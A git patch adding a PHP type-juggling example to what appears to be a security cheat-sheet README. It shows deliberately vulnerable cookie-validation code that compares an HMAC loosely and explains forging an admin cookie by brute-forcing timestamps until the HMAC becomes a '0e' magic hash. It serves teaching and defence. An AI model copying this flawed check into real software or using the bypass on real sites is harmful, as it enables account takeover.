From 35f2834eaa5b5d3b58128b2164d38471835d2553 Mon Sep 17 00:00:00 2001
From: OOP
Date: Fri, 23 Oct 2020 23:12:45 +0700
Subject: [PATCH 1/2] add type juggling example

---
 Type Juggling/README.md | 34 ++++++++++++++++++++++++++++++++++
 1 file changed, 34 insertions(+)

diff --git a/Type Juggling/README.md b/Type Juggling/README.md
index 7e97f99..26dcfd1 100644
--- a/Type Juggling/README.md
+++ b/Type Juggling/README.md
@@ -38,6 +38,40 @@ var_dump(sha1([])); # NULL
 var_dump(md5([])); # NULL
 ```
 
+### Example vulnerable code
+
+```php
+function validate_cookie($cookie,$key){
+ $hash = hash_hmac('md5', $cookie['username'] . '|' . $cookie['$expiration'], $key);
+ if($cookie['hmac'] != $hash){ // loose comparison
+ return false;
+ ...
+```
+
+The $cookie variable is provided by the user. The $key variable is a secret and unknown to the user.
+
+If we can make the calculated hash string Zero-like, and provide "0" in the $cookie['hmac'], the check will pass.
+
+```
+"0e768261251903820937390661668547" == "0"
+```
+
+We have control over 3 elements in the cookie:
+- $username - username you are targetting, probably "admin"
+- $hmac - the provided hash, "0"
+- $expiration - a UNIX timestamp, must be in the future
+
+Increase the expiration timestamp enough times and we will eventually get a Zero-like calculated HMAC.
+
+```
+hash_hmac(admin|1424869663) -> "e716865d1953e310498068ee39922f49"
+hash_hmac(admin|1424869664) -> "8c9a492d316efb5e358ceefe3829bde4"
+hash_hmac(admin|1424869665) -> "9f7cdbe744fc2dae1202431c7c66334b"
+hash_hmac(admin|1424869666) -> "105c0abe89825a14c471d4f0c1cc20ab"
+...
+hash_hmac(admin|1835970773) -> "0e174892301580325162390102935332" // "0e174892301580325162390102935332" == "0"
+```
+
 ## Magic Hashes - Exploit
 
 If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP will treat the hash as a float.

From f2e30789156f9949d0ffee39cbe6d198e40675d8 Mon Sep 17 00:00:00 2001
From: OOP
Date: Fri, 23 Oct 2020 23:15:59 +0700
Subject: [PATCH 2/2] add reference

---
 Type Juggling/README.md | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/Type Juggling/README.md b/Type Juggling/README.md
index 26dcfd1..7ceaf0b 100644
--- a/Type Juggling/README.md
+++ b/Type Juggling/README.md
@@ -100,4 +100,5 @@ var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m')); ## References * [Writing Exploits For Exotic Bug Classes: PHP Type Juggling By Tyler Borland](http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
-* [Magic Hashes - WhieHatSec](https://www.whitehatsec.com/blog/magic-hashes/)
\ No newline at end of file
+* [Magic Hashes - WhieHatSec](https://www.whitehatsec.com/blog/magic-hashes/)
+* [PHP Magic Tricks: Type Juggling](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf)
\ No newline at end of file